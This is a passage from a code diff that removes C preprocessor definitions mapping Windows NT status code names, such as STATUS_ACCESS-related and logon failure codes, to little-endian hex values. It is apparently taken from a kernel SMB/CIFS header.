+-#define STATUS_QUOTA_EXCEEDED cpu_to_le32(0xC0000044)
+-#define STATUS_INVALID_PAGE_PROTECTION cpu_to_le32(0xC0000045)
+-#define STATUS_MUTANT_NOT_OWNED cpu_to_le32(0xC0000046)
+-#define STATUS_SEMAPHORE_LIMIT_EXCEEDED cpu_to_le32(0xC0000047)
+-#define STATUS_PORT_ALREADY_SET cpu_to_le32(0xC0000048)
+-#define STATUS_SECTION_NOT_IMAGE cpu_to_le32(0xC0000049)
+-#define STATUS_SUSPEND_COUNT_EXCEEDED cpu_to_le32(0xC000004A)
+-#define STATUS_THREAD_IS_TERMINATING cpu_to_le32(0xC000004B)
+-#define STATUS_BAD_WORKING_SET_LIMIT cpu_to_le32(0xC000004C)
+-#define STATUS_INCOMPATIBLE_FILE_MAP cpu_to_le32(0xC000004D)
+-#define STATUS_SECTION_PROTECTION cpu_to_le32(0xC000004E)
+-#define STATUS_EAS_NOT_SUPPORTED cpu_to_le32(0xC000004F)
+-#define STATUS_EA_TOO_LARGE cpu_to_le32(0xC0000050)
+-#define STATUS_NONEXISTENT_EA_ENTRY cpu_to_le32(0xC0000051)
+-#define STATUS_NO_EAS_ON_FILE cpu_to_le32(0xC0000052)
+-#define STATUS_EA_CORRUPT_ERROR cpu_to_le32(0xC0000053)
+-#define STATUS_FILE_LOCK_CONFLICT cpu_to_le32(0xC0000054)
+-#define STATUS_LOCK_NOT_GRANTED cpu_to_le32(0xC0000055)
+-#define STATUS_DELETE_PENDING cpu_to_le32(0xC0000056)
+-#define STATUS_CTL_FILE_NOT_SUPPORTED cpu_to_le32(0xC0000057)
+-#define STATUS_UNKNOWN_REVISION cpu_to_le32(0xC0000058)
+-#define STATUS_REVISION_MISMATCH cpu_to_le32(0xC0000059)
+-#define STATUS_INVALID_OWNER cpu_to_le32(0xC000005A)
+-#define STATUS_INVALID_PRIMARY_GROUP cpu_to_le32(0xC000005B)
+-#define STATUS_NO_IMPERSONATION_TOKEN cpu_to_le32(0xC000005C)
+-#define STATUS_CANT_DISABLE_MANDATORY cpu_to_le32(0xC000005D)
+-#define STATUS_NO_LOGON_SERVERS cpu_to_le32(0xC000005E)
+-#define STATUS_NO_SUCH_LOGON_SESSION cpu_to_le32(0xC000005F)
+-#define STATUS_NO_SUCH_PRIVILEGE cpu_to_le32(0xC0000060)
+-#define STATUS_PRIVILEGE_NOT_HELD cpu_to_le32(0xC0000061)
+-#define STATUS_INVALID_ACCOUNT_NAME cpu_to_le32(0xC0000062)
+-#define STATUS_USER_EXISTS cpu_to_le32(0xC0000063)
+-#define STATUS_NO_SUCH_USER cpu_to_le32(0xC0000064)
+-#define STATUS_GROUP_EXISTS cpu_to_le32(0xC0000065)
+-#define STATUS_NO_SUCH_GROUP cpu_to_le32(0xC0000066)
+-#define STATUS_MEMBER_IN_GROUP cpu_to_le32(0xC0000067)
+-#define STATUS_MEMBER_NOT_IN_GROUP cpu_to_le32(0xC0000068)
+-#define STATUS_LAST_ADMIN cpu_to_le32(0xC0000069)
+-#define STATUS_WRONG_PASSWORD cpu_to_le32(0xC000006A)
+-#define STATUS_ILL_FORMED_PASSWORD cpu_to_le32(0xC000006B)
+-#define STATUS_PASSWORD_RESTRICTION cpu_to_le32(0xC000006C)
+-#define STATUS_LOGON_FAILURE cpu_to_le32(0xC000006D)
+-#define STATUS_ACCOUNT_RESTRICTION cpu_to_le32(0xC000006E)
+-#define STATUS_INVALID_LOGON_HOURS cpu_to_le32(0xC000006F)
+-#define STATUS_INVALID_WORKSTATION cpu_to_le32(0xC0000070)
+-#define STATUS_PASSWORD_EXPIRED cpu_to_le32(0xC0000071)
+-#define STATUS_ACCOUNT_DISABLED cpu_to_le32(0xC0000072)
+-#define STATUS_NONE_MAPPED cpu_to_le32(0xC0000073)
+-#define STATUS_TOO_MANY_LUIDS_REQUESTED cpu_to_le32(0xC0000074)
+-#define STATUS_LUIDS_EXHAUSTED cpu_to_le32(0xC0000075)
+-#define STATUS_INVALID_SUB_AUTHORITY cpu_to_le32(0xC0000076)
+-#define STATUS_INVALID_ACL cpu_to_le32(0xC0000077)
+-#define STATUS_INVALID_SID cpu_to_le32(0xC0000078)
+-#define STATUS_INVALID_SECURITY_DESCR cpu_to_le32(0xC0000079)
+-#define STATUS_PROCEDURE_NOT_FOUND cpu_to_le32(0xC000007A)
+-#define STATUS_INVALID_IMAGE_FORMAT cpu_to_le32(0xC000007B)
+-#define STATUS_NO_TOKEN cpu_to_le32(0xC000007C)
+-#define STATUS_BAD_INHERITANCE_ACL cpu_to_le32(0xC000007D)
+-#define STATUS_RANGE_NOT_LOCKED cpu_to_le32(0xC000007E)
+-#define STATUS_DISK_FULL cpu_to_le32(0xC000007F)
+-#define STATUS_SERVER_DISABLED cpu_to_le32(0xC0000080)
+-#define STATUS_SERVER_NOT_DISABLED cpu_to_le32(0xC0000081)
+-#define STATUS_TOO_MANY_GUIDS_REQUESTED cpu_to_le32(0xC0000082)
+-#define STATUS_GUIDS_EXHAUSTED cpu_to_le32(0xC0000083)
+-#define STATUS_INVALID_ID_AUTHORITY cpu_to_le32(0xC0000084)
+-#define STATUS_AGENTS_EXHAUSTED cpu_to_le32(0xC0000085)
+-#define STATUS_INVALID_VOLUME_LABEL cpu_to_le32(0xC0000086)
+-#define STATUS_SECTION_NOT_EXTENDED cpu_to_le32(0xC0000087)
+-#define STATUS_NOT_MAPPED_DATA cpu_to_le32(0xC0000088)
+-#define STATUS_RESOURCE_DATA_NOT_FOUND cpu_to_le32(0xC0000089)
+-#define STATUS_RESOURCE_TYPE_NOT_FOUND cpu_to_le32(0xC000008A)
+-#define STATUS_RESOURCE_NAME_NOT_FOUND cpu_to_le32(0xC000008B)
+-#define STATUS_ARRAY_BOUNDS_EXCEEDED cpu_to_le32(0xC000008C)
+-#define STATUS_FLOAT_DENORMAL_OPERAND cpu_to_le32(0xC000008D)
+-#define STATUS_FLOAT_DIVIDE_BY_ZERO cpu_to_le32(0xC000008E)
+-#define STATUS_FLOAT_INEXACT_RESULT cpu_to_le32(0xC000008F)
+-#define STATUS_FLOAT_INVALID_OPERATION cpu_to_le32(0xC0000090)
+-#define STATUS_FLOAT_OVERFLOW cpu_to_le32(0xC0000091)
+-#define STATUS_FLOAT_STACK_CHECK cpu_to_le32(0xC0000092)
+-#define STATUS_FLOAT_UNDERFLOW cpu_to_le32(0xC0000093)
+-#define STATUS_INTEGER_DIVIDE_BY_ZERO cpu_to_le32(0xC0000094)
+-#define STATUS_INTEGER_OVERFLOW cpu_to_le32(0xC0000095)
+-#define STATUS_PRIVILEGED_INSTRUCTION cpu_to_le32(0xC0000096)
+-#define STATUS_TOO_MANY_PAGING_FILES cpu_to_le32(0xC0000097)
+-#define STATUS_FILE_INVALID cpu_to_le32(0xC0000098)
+-#define STATUS_ALLOTTED_SPACE_EXCEEDED cpu_to_le32(0xC0000099)
+-#define STATUS_INSUFFICIENT_RESOURCES cpu_to_le32(0xC000009A)
+-#define STATUS_DFS_EXIT_PATH_FOUND cpu_to_le32(0xC000009B)
+-#define STATUS_DEVICE_DATA_ERROR cpu_to_le32(0xC000009C)
+-#define STATUS_DEVICE_NOT_CONNECTED cpu_to_le32(0xC000009D)
+-#define STATUS_DEVICE_POWER_FAILURE cpu_to_le32(0xC000009E)
+-#define STATUS_FREE_VM_NOT_AT_BASE cpu_to_le32(0xC000009F)
+-#define STATUS_MEMORY_NOT_ALLOCATED cpu_to_le32(0xC00000A0)
+-#define STATUS_WORKING_SET_QUOTA cpu_to_le32(0xC00000A1)
+-#define STATUS_MEDIA_WRITE_PROTECTED cpu_to_le32(0xC00000A2)
+-#define STATUS_DEVICE_NOT_READY cpu_to_le32(0xC00000A3)
+-#define STATUS_INVALID_GROUP_ATTRIBUTES cpu_to_le32(0xC00000A4)
+-#define STATUS_BAD_IMPERSONATION_LEVEL cpu_to_le32(0xC00000A5)
+-#define STATUS_CANT_OPEN_ANONYMOUS cpu_to_le32(0xC00000A6)
+-#define STATUS_BAD_VALIDATION_CLASS cpu_to_le32(0xC00000A7)
+-#define STATUS_BAD_TOKEN_TYPE cpu_to_le32(0xC00000A8)
+-#define STATUS_BAD_MASTER_BOOT_RECORD cpu_to_le32(0xC00000A9)
+-#define STATUS_INSTRUCTION_MISALIGNMENT cpu_to_le32(0xC00000AA)
+-#define STATUS_INSTANCE_NOT_AVAILABLE cpu_to_le32(0xC00000AB)
+-#define STATUS_PIPE_NOT_AVAILABLE cpu_to_le32(0xC00000AC)
+-#define STATUS_INVALID_PIPE_STATE cpu_to_le32(0xC00000AD)
+-#define STATUS_PIPE_BUSY cpu_to_le32(0xC00000AE)
+-#define STATUS_ILLEGAL_FUNCTION cpu_to_le32(0xC00000AF)
+-#define STATUS_PIPE_DISCONNECTED cpu_to_le32(0xC00000B0)
+-#define STATUS_PIPE_CLOSING cpu_to_le32(0xC00000B1)
+-#define STATUS_PIPE_CONNECTED cpu_to_le32(0xC00000B2)
+-#define STATUS_PIPE_LISTENING cpu_to_le32(0xC00000B3)
+-#define STATUS_INVALID_READ_MODE cpu_to_le32(0xC00000B4)
+-#define STATUS_IO_TIMEOUT cpu_to_le32(0xC00000B5)
+-#define STATUS_FILE_FORCED_CLOSED cpu_to_le32(0xC00000B6)
+-#define STATUS_PROFILING_NOT_STARTED cpu_to_le32(0xC00000B7)
+-#define STATUS_PROFILING_NOT_STOPPED cpu_to_le32(0xC00000B8)
+-#define STATUS_COULD_NOT_INTERPRET cpu_to_le32(0xC00000B9)
+-#define STATUS_FILE_IS_A_DIRECTORY cpu_to_le32(0xC00000BA)
+-#define STATUS_NOT_SUPPORTED cpu_to_le32(0xC00000BB)
+-#define STATUS_REMOTE_NOT_LISTENING cpu_to_le32(0xC00000BC)
+-#define STATUS_DUPLICATE_NAME cpu_to_le32(0xC00000BD)
+-#define STATUS_BAD_NETWORK_PATH cpu_to_le32(0xC00000BE)
+-#define STATUS_NETWORK_BUSY cpu_to_le32(0xC00000BF)
+-#define STATUS_DEVICE_DOES_NOT_EXIST cpu_to_le32(0xC00000C0)
+-#define STATUS_TOO_MANY_COMMANDS cpu_to_le32(0xC00000C1)
+-#define STATUS_ADAPTER_HARDWARE_ERROR cpu_to_le32(0xC00000C2)
+-#define STATUS_INVALID_NETWORK_RESPONSE cpu_to_le32(0xC00000C3)
+-#define STATUS_UNEXPECTED_NETWORK_ERROR cpu_to_le32(0xC00000C4)
+-#define STATUS_BAD_REMOTE_ADAPTER cpu_to_le32(0xC00000C5)
+-#define STATUS_PRINT_QUEUE_FULL cpu_to_le32(0xC00000C6)
+-#define STATUS_NO_SPOOL_SPACE cpu_to_le32(0xC00000C7)
+-#define STATUS_PRINT_CANCELLED cpu_to_le32(0xC00000C8)
+-#define STATUS_NETWORK_NAME_DELETED cpu_to_le32(0xC00000C9)
+-#define STATUS_NETWORK_ACCESS_DENIED cpu_to_le32(0xC00000CA)
+-#define STATUS_BAD_DEVICE_TYPE cpu_to_le32(0xC00000CB)
+-#define STATUS_BAD_NETWORK_NAME cpu_to_le32(0xC00000CC)
+-#define STATUS_TOO_MANY_NAMES cpu_to_le32(0xC00000CD)
+-#define STATUS_TOO_MANY_SESSIONS cpu_to_le32(0xC00000CE)
+-#define STATUS_SHARING_PAUSED cpu_to_le32(0xC00000CF)
+-#define STATUS_REQUEST_NOT_ACCEPTED cpu_to_le32(0xC00000D0)
+-#define STATUS_REDIRECTOR_PAUSED cpu_to_le32(0xC00000D1)
+-#define STATUS_NET_WRITE_FAULT cpu_to_le32(0xC00000D2)
+-#define STATUS_PROFILING_AT_LIMIT cpu_to_le32(0xC00000D3)
+-#define STATUS_NOT_SAME_DEVICE cpu_to_le32(0xC00000D4)
+-#define STATUS_FILE_RENAMED cpu_to_le32(0xC00000D5)
+-#define STATUS_VIRTUAL_CIRCUIT_CLOSED cpu_to_le32(0xC00000D6)
+-#define STATUS_NO_SECURITY_ON_OBJECT cpu_to_le32(0xC00000D7)
+-#define STATUS_CANT_WAIT cpu_to_le32(0xC00000D8)
+-#define STATUS_PIPE_EMPTY cpu_to_le32(0xC00000D9)
+-#define STATUS_CANT_ACCESS_DOMAIN_INFO cpu_to_le32(0xC00000DA)
+-#define STATUS_CANT_TERMINATE_SELF cpu_to_le32(0xC00000DB)
+-#define STATUS_INVALID_SERVER_STATE cpu_to_le32(0xC00000DC)
+-#define STATUS_INVALID_DOMAIN_STATE cpu_to_le32(0xC00000DD)
+-#define STATUS_INVALID_DOMAIN_ROLE cpu_to_le32(0xC00000DE)
+-#define STATUS_NO_SUCH_DOMAIN cpu_to_le32(0xC00000DF)
+-#define STATUS_DOMAIN_EXISTS cpu_to_le32(0xC00000E0)
+-#define STATUS_DOMAIN_LIMIT_EXCEEDED cpu_to_le32(0xC00000E1)
+-#define STATUS_OPLOCK_NOT_GRANTED cpu_to_le32(0xC00000E2)
+-#define STATUS_INVALID_OPLOCK_PROTOCOL cpu_to_le32(0xC00000E3)
+-#define STATUS_INTERNAL_DB_CORRUPTION cpu_to_le32(0xC00000E4)
+-#define STATUS_INTERNAL_ERROR cpu_to_le32(0xC00000E5)
+-#define STATUS_GENERIC_NOT_MAPPED cpu_to_le32(0xC00000E6)
+-#define STATUS_BAD_DESCRIPTOR_FORMAT cpu_to_le32(0xC00000E7)
+-#define STATUS_INVALID_USER_BUFFER cpu_to_le32(0xC00000E8)
+-#define STATUS_UNEXPECTED_IO_ERROR cpu_to_le32(0xC00000E9)
+-#define STATUS_UNEXPECTED_MM_CREATE_ERR cpu_to_le32(0xC00000EA)
+-#define STATUS_UNEXPECTED_MM_MAP_ERROR cpu_to_le32(0xC00000EB)
+-#define STATUS_UNEXPECTED_MM_EXTEND_ERR cpu_to_le32(0xC00000EC)
+-#define STATUS_NOT_LOGON_PROCESS cpu_to_le32(0xC00000ED)
+-#define STATUS_LOGON_SESSION_EXISTS cpu_to_le32(0xC00000EE)
+-#define STATUS_INVALID_PARAMETER_1 cpu_to_le32(0xC00000EF)
+-#define STATUS_INVALID_PARAMETER_2 cpu_to_le32(0xC00000F0)
+-#define STATUS_INVALID_PARAMETER_3 cpu_to_le32(0xC00000F1)
+-#define STATUS_INVALID_PARAMETER_4 cpu_to_le32(0xC00000F2)
+-#define STATUS_INVALID_PARAMETER_5 cpu_to_le32(0xC00000F3)
+-#define STATUS_INVALID_PARAMETER_6 cpu_to_le32(0xC00000F4)
+-#define STATUS_INVALID_PARAMETER_7 cpu_to_le32(0xC00000F5)
+-#define STATUS_INVALID_PARAMETER_8 cpu_to_le32(0xC00000F6)
+-#define STATUS_INVALID_PARAMETER_9 cpu_to_le32(0xC00000F7)
+-#define STATUS_INVALID_PARAMETER_10 cpu_to_le32(0xC00000F8)
+-#define STATUS_INVALID_PARAMETER_11 cpu_to_le32(0xC00000F9)
+-#define STATUS_INVALID_PARAMETER_12 cpu_to_le32(0xC00000FA)
+-#define STATUS_REDIRECTOR_NOT_STARTED cpu_to_le32(0xC00000FB)
+-#define STATUS_REDIRECTOR_STARTED cpu_to_le32(0xC00000FC)
+-#define STATUS_STACK_OVERFLOW cpu_to_le32(0xC00000FD)
+-#define STATUS_NO_SUCH_PACKAGE cpu_to_le32(0xC00000FE)
+-#define STATUS_BAD_FUNCTION_TABLE cpu_to_le32(0xC00000FF)
+-#define STATUS_VARIABLE_NOT_FOUND cpu_to_le32(0xC0000100)
+-#define STATUS_DIRECTORY_NOT_EMPTY cpu_to_le32(0xC0000101)
+-#define STATUS_FILE_CORRUPT_ERROR cpu_to_le32(0xC0000102)
+-#define STATUS_NOT_A_DIRECTORY cpu_to_le32(0xC0000103)
+-#define STATUS_BAD_LOGON_SESSION_STATE cpu_to_le32(0xC0000104)
+-#define STATUS_LOGON_SESSION_COLLISION cpu_to_le32(0xC0000105)
+-#define STATUS_NAME_TOO_LONG cpu_to_le32(0xC0000106)
+-#define STATUS_FILES_OPEN cpu_to_le32(0xC0000107)
+-#define STATUS_CONNECTION_IN_USE cpu_to_le32(0xC0000108)
+-#define STATUS_MESSAGE_NOT_FOUND cpu_to_le32(0xC0000109)
+-#define STATUS_PROCESS_IS_TERMINATING cpu_to_le32(0xC000010A)
+-#define STATUS_INVALID_LOGON_TYPE cpu_to_le32(0xC000010B)
+-#define STATUS_NO_GUID_TRANSLATION cpu_to_le32(0xC000010C)
+-#define STATUS_CANNOT_IMPERSONATE cpu_to_le32(0xC000010D)
+-#define STATUS_IMAGE_ALREADY_LOADED cpu_to_le32(0xC000010E)
+-#define STATUS_ABIOS_NOT_PRESENT cpu_to_le32(0xC000010F)
+-#define STATUS_ABIOS_LID_NOT_EXIST cpu_to_le32(0xC0000110)
+-#define STATUS_ABIOS_LID_ALREADY_OWNED cpu_to_le32(0xC0000111)
+-#define STATUS_ABIOS_NOT_LID_OWNER cpu_to_le32(0xC0000112)
+-#define STATUS_ABIOS_INVALID_COMMAND cpu_to_le32(0xC0000113)
+-#define STATUS_ABIOS_INVALID_LID cpu_to_le32(0xC0000114)
+-#define STATUS_ABIOS_SELECTOR_NOT_AVAILABLE cpu_to_le32(0xC0000115)
+-#define STATUS_ABIOS_INVALID_SELECTOR cpu_to_le32(0xC0000116)
+-#define STATUS_NO_LDT cpu_to_le32(0xC0000117)
+-#define STATUS_INVALID_LDT_SIZE cpu_to_le32(0xC0000118)
+-#define STATUS_INVALID_LDT_OFFSET cpu_to_le32(0xC0000119)
+-#define STATUS_INVALID_LDT_DESCRIPTOR cpu_to_le32(0xC000011A)
+-#define STATUS_INVALID_IMAGE_NE_FORMAT cpu_to_le32(0xC000011B)
+-#define STATUS_RXACT_INVALID_STATE cpu_to_le32(0xC000011C)
+-#define STATUS_RXACT_COMMIT_FAILURE cpu_to_le32(0xC000011D)
+-#define STATUS_MAPPED_FILE_SIZE_ZERO cpu_to_le32(0xC000011E)
+-#define STATUS_TOO_MANY_OPENED_FILES cpu_to_le32(0xC000011F)
+-#define STATUS_CANCELLED cpu_to_le32(0xC0000120)
+-#define STATUS_CANNOT_DELETE cpu_to_le32(0xC0000121)
+-#define STATUS_INVALID_COMPUTER_NAME cpu_to_le32(0xC0000122)
+-#define STATUS_FILE_DELETED cpu_to_le32(0xC0000123)
+-#define STATUS_SPECIAL_ACCOUNT cpu_to_le32(0xC0000124)
+-#define STATUS_SPECIAL_GROUP cpu_to_le32(0xC0000125)
+-#define STATUS_SPECIAL_USER cpu_to_le32(0xC0000126)
+-#define STATUS_MEMBERS_PRIMARY_GROUP cpu_to_le32(0xC0000127)
+-#define STATUS_FILE_CLOSED cpu_to_le32(0xC0000128)
+-#define STATUS_TOO_MANY_THREADS cpu_to_le32(0xC0000129)
+-#define STATUS_THREAD_NOT_IN_PROCESS cpu_to_le32(0xC000012A)
+-#define STATUS_TOKEN_ALREADY_IN_USE cpu_to_le32(0xC000012B)
+-#define STATUS_PAGEFILE_QUOTA_EXCEEDED cpu_to_le32(0xC000012C)
+-#define STATUS_COMMITMENT_LIMIT cpu_to_le32(0xC000012D)
+-#define STATUS_INVALID_IMAGE_LE_FORMAT cpu_to_le32(0xC000012E)
+-#define STATUS_INVALID_IMAGE_NOT_MZ cpu_to_le32(0xC000012F)
+-#define STATUS_INVALID_IMAGE_PROTECT cpu_to_le32(0xC0000130)
+-#define STATUS_INVALID_IMAGE_WIN_16 cpu_to_le32(0xC0000131)
+-#define STATUS_LOGON_SERVER_CONFLICT cpu_to_le32(0xC0000132)
+-#define STATUS_TIME_DIFFERENCE_AT_DC cpu_to_le32(0xC0000133)
+-#define STATUS_SYNCHRONIZATION_REQUIRED cpu_to_le32(0xC0000134)
+-#define STATUS_DLL_NOT_FOUND cpu_to_le32(0xC0000135)
+-#define STATUS_OPEN_FAILED cpu_to_le32(0xC0000136)
+-#define STATUS_IO_PRIVILEGE_FAILED cpu_to_le32(0xC0000137)
+-#define STATUS_ORDINAL_NOT_FOUND cpu_to_le32(0xC0000138)
+-#define STATUS_ENTRYPOINT_NOT_FOUND cpu_to_le32(0xC0000139)
+-#define STATUS_CONTROL_C_EXIT cpu_to_le32(0xC000013A)
+-#define STATUS_LOCAL_DISCONNECT cpu_to_le32(0xC000013B)
+-#define STATUS_REMOTE_DISCONNECT cpu_to_le32(0xC000013C)
+-#define STATUS_REMOTE_RESOURCES cpu_to_le32(0xC000013D)
+-#define STATUS_LINK_FAILED cpu_to_le32(0xC000013E)
+-#define STATUS_LINK_TIMEOUT cpu_to_le32(0xC000013F)
+-#define STATUS_INVALID_CONNECTION cpu_to_le32(0xC0000140)
+-#define STATUS_INVALID_ADDRESS cpu_to_le32(0xC0000141)
+-#define STATUS_DLL_INIT_FAILED cpu_to_le32(0xC0000142)
+-#define STATUS_MISSING_SYSTEMFILE cpu_to_le32(0xC0000143)
+-#define STATUS_UNHANDLED_EXCEPTION cpu_to_le32(0xC0000144)
+-#define STATUS_APP_INIT_FAILURE cpu_to_le32(0xC0000145)
+-#define STATUS_PAGEFILE_CREATE_FAILED cpu_to_le32(0xC0000146)
+-#define STATUS_NO_PAGEFILE cpu_to_le32(0xC0000147)
+-#define STATUS_INVALID_LEVEL cpu_to_le32(0xC0000148)
+-#define STATUS_WRONG_PASSWORD_CORE cpu_to_le32(0xC0000149)
+-#define STATUS_ILLEGAL_FLOAT_CONTEXT cpu_to_le32(0xC000014A)
+-#define STATUS_PIPE_BROKEN cpu_to_le32(0xC000014B)
+-#define STATUS_REGISTRY_CORRUPT cpu_to_le32(0xC000014C)
+-#define STATUS_REGISTRY_IO_FAILED cpu_to_le32(0xC000014D)
+-#define STATUS_NO_EVENT_PAIR cpu_to_le32(0xC000014E)
+-#define STATUS_UNRECOGNIZED_VOLUME cpu_to_le32(0xC000014F)
+-#define STATUS_SERIAL_NO_DEVICE_INITED cpu_to_le32(0xC0000150)
+-#define STATUS_NO_SUCH_ALIAS cpu_to_le32(0xC0000151)
+-#define STATUS_MEMBER_NOT_IN_ALIAS cpu_to_le32(0xC0000152)
+-#define STATUS_MEMBER_IN_ALIAS cpu_to_le32(0xC0000153)
+-#define STATUS_ALIAS_EXISTS cpu_to_le32(0xC0000154)
+-#define STATUS_LOGON_NOT_GRANTED cpu_to_le32(0xC0000155)
+-#define STATUS_TOO_MANY_SECRETS cpu_to_le32(0xC0000156)
+-#define STATUS_SECRET_TOO_LONG cpu_to_le32(0xC0000157)
+-#define STATUS_INTERNAL_DB_ERROR cpu_to_le32(0xC0000158)
+-#define STATUS_FULLSCREEN_MODE cpu_to_le32(0xC0000159)
+-#define STATUS_TOO_MANY_CONTEXT_IDS cpu_to_le32(0xC000015A)
+-#define STATUS_LOGON_TYPE_NOT_GRANTED cpu_to_le32(0xC000015B)
+-#define STATUS_NOT_REGISTRY_FILE cpu_to_le32(0xC000015C)
+-#define STATUS_NT_CROSS_ENCRYPTION_REQUIRED cpu_to_le32(0xC000015D)
+-#define STATUS_DOMAIN_CTRLR_CONFIG_ERROR cpu_to_le32(0xC000015E)
+-#define STATUS_FT_MISSING_MEMBER cpu_to_le32(0xC000015F)
+-#define STATUS_ILL_FORMED_SERVICE_ENTRY cpu_to_le32(0xC0000160)
+-#define STATUS_ILLEGAL_CHARACTER cpu_to_le32(0xC0000161)
+-#define STATUS_UNMAPPABLE_CHARACTER cpu_to_le32(0xC0000162)
+-#define STATUS_UNDEFINED_CHARACTER cpu_to_le32(0xC0000163)
+-#define STATUS_FLOPPY_VOLUME cpu_to_le32(0xC0000164)
+-#define STATUS_FLOPPY_ID_MARK_NOT_FOUND cpu_to_le32(0xC0000165)
+-#define STATUS_FLOPPY_WRONG_CYLINDER cpu_to_le32(0xC0000166)
+-#define STATUS_FLOPPY_UNKNOWN_ERROR cpu_to_le32(0xC0000167)
+-#define STATUS_FLOPPY_BAD_REGISTERS cpu_to_le32(0xC0000168)
+-#define STATUS_DISK_RECALIBRATE_FAILED cpu_to_le32(0xC0000169)
+-#define STATUS_DISK_OPERATION_FAILED cpu_to_le32(0xC000016A)
+-#define STATUS_DISK_RESET_FAILED cpu_to_le32(0xC000016B)
+-#define STATUS_SHARED_IRQ_BUSY cpu_to_le32(0xC000016C)
+-#define STATUS_FT_ORPHANING cpu_to_le32(0xC000016D)
+-#define STATUS_BIOS_FAILED_TO_CONNECT_INTERRUPT cpu_to_le32(0xC000016E)
+-#define STATUS_PARTITION_FAILURE cpu_to_le32(0xC0000172)
+-#define STATUS_INVALID_BLOCK_LENGTH cpu_to_le32(0xC0000173)
+-#define STATUS_DEVICE_NOT_PARTITIONED cpu_to_le32(0xC0000174)
+-#define STATUS_UNABLE_TO_LOCK_MEDIA cpu_to_le32(0xC0000175)
+-#define STATUS_UNABLE_TO_UNLOAD_MEDIA cpu_to_le32(0xC0000176)
+-#define STATUS_EOM_OVERFLOW cpu_to_le32(0xC0000177)
+-#define STATUS_NO_MEDIA cpu_to_le32(0xC0000178)
+-#define STATUS_NO_SUCH_MEMBER cpu_to_le32(0xC000017A)
+-#define STATUS_INVALID_MEMBER cpu_to_le32(0xC000017B)
+-#define STATUS_KEY_DELETED cpu_to_le32(0xC000017C)
+-#define STATUS_NO_LOG_SPACE cpu_to_le32(0xC000017D)
+-#define STATUS_TOO_MANY_SIDS cpu_to_le32(0xC000017E)
+-#define STATUS_LM_CROSS_ENCRYPTION_REQUIRED cpu_to_le32(0xC000017F)
+-#define STATUS_KEY_HAS_CHILDREN cpu_to_le32(0xC0000180)
+-#define STATUS_CHILD_MUST_BE_VOLATILE cpu_to_le32(0xC0000181)
+-#define STATUS_DEVICE_CONFIGURATION_ERROR cpu_to_le32(0xC0000182)
+-#define STATUS_DRIVER_INTERNAL_ERROR cpu_to_le32(0xC0000183)
+-#define STATUS_INVALID_DEVICE_STATE cpu_to_le32(0xC0000184)
+-#define STATUS_IO_DEVICE_ERROR cpu_to_le32(0xC0000185)
+-#define STATUS_DEVICE_PROTOCOL_ERROR cpu_to_le32(0xC0000186)
+-#define STATUS_BACKUP_CONTROLLER cpu_to_le32(0xC0000187)
+-#define STATUS_LOG_FILE_FULL cpu_to_le32(0xC0000188)
+-#define STATUS_TOO_LATE cpu_to_le32(0xC0000189)
+-#define STATUS_NO_TRUST_LSA_SECRET cpu_to_le32(0xC000018A)
+-#define STATUS_NO_TRUST_SAM_ACCOUNT cpu_to_le32(0xC000018B)
+-#define STATUS_TRUSTED_DOMAIN_FAILURE cpu_to_le32(0xC000018C)
+-#define STATUS_TRUSTED_RELATIONSHIP_FAILURE cpu_to_le32(0xC000018D)
+-#define STATUS_EVENTLOG_FILE_CORRUPT cpu_to_le32(0xC000018E)
+-#define STATUS_EVENTLOG_CANT_START cpu_to_le32(0xC000018F)
+-#define STATUS_TRUST_FAILURE cpu_to_le32(0xC0000190)
+-#define STATUS_MUTANT_LIMIT_EXCEEDED cpu_to_le32(0xC0000191)
+-#define STATUS_NETLOGON_NOT_STARTED cpu_to_le32(0xC0000192)
+-#define STATUS_ACCOUNT_EXPIRED cpu_to_le32(0xC0000193)
+-#define STATUS_POSSIBLE_DEADLOCK cpu_to_le32(0xC0000194)
+-#define STATUS_NETWORK_CREDENTIAL_CONFLICT cpu_to_le32(0xC0000195)
+-#define STATUS_REMOTE_SESSION_LIMIT cpu_to_le32(0xC0000196)
+-#define STATUS_EVENTLOG_FILE_CHANGED cpu_to_le32(0xC0000197)
+-#define STATUS_NOLOGON_INTERDOMAIN_TRUST_ACCOUNT cpu_to_le32(0xC0000198)
+-#define STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT cpu_to_le32(0xC0000199)
+-#define STATUS_NOLOGON_SERVER_TRUST_ACCOUNT cpu_to_le32(0xC000019A)
+-#define STATUS_DOMAIN_TRUST_INCONSISTENT cpu_to_le32(0xC000019B)
+-#define STATUS_FS_DRIVER_REQUIRED cpu_to_le32(0xC000019C)
+-#define STATUS_IMAGE_ALREADY_LOADED_AS_DLL cpu_to_le32(0xC000019D)
+-#define STATUS_NETWORK_OPEN_RESTRICTION cpu_to_le32(0xC0000201)
+-#define STATUS_NO_USER_SESSION_KEY cpu_to_le32(0xC0000202)
+-#define STATUS_USER_SESSION_DELETED cpu_to_le32(0xC0000203)
+-#define STATUS_RESOURCE_LANG_NOT_FOUND cpu_to_le32(0xC0000204)
+-#define STATUS_INSUFF_SERVER_RESOURCES cpu_to_le32(0xC0000205)
+-#define STATUS_INVALID_BUFFER_SIZE cpu_to_le32(0xC0000206)
+-#define STATUS_INVALID_ADDRESS_COMPONENT cpu_to_le32(0xC0000207)
+-#define STATUS_INVALID_ADDRESS_WILDCARD cpu_to_le32(0xC0000208)
+-#define STATUS_TOO_MANY_ADDRESSES cpu_to_le32(0xC0000209)
+-#define STATUS_ADDRESS_ALREADY_EXISTS cpu_to_le32(0xC000020A)
+-#define STATUS_ADDRESS_CLOSED cpu_to_le32(0xC000020B)
+-#define STATUS_CONNECTION_DISCONNECTED cpu_to_le32(0xC000020C)
+-#define STATUS_CONNECTION_RESET cpu_to_le32(0xC000020D)
+-#define STATUS_TOO_MANY_NODES cpu_to_le32(0xC000020E)
+-#define STATUS_TRANSACTION_ABORTED cpu_to_le32(0xC000020F)
+-#define STATUS_TRANSACTION_TIMED_OUT cpu_to_le32(0xC0000210)
+-#define STATUS_TRANSACTION_NO_RELEASE cpu_to_le32(0xC0000211)
+-#define STATUS_TRANSACTION_NO_MATCH cpu_to_le32(0xC0000212)
+-#define STATUS_TRANSACTION_RESPONDED cpu_to_le32(0xC0000213)
+-#define STATUS_TRANSACTION_INVALID_ID cpu_to_le32(0xC0000214)
+-#define STATUS_TRANSACTION_INVALID_TYPE cpu_to_le32(0xC0000215)
+-#define STATUS_NOT_SERVER_SESSION cpu_to_le32(0xC0000216)
+-#define STATUS_NOT_CLIENT_SESSION cpu_to_le32(0xC0000217)
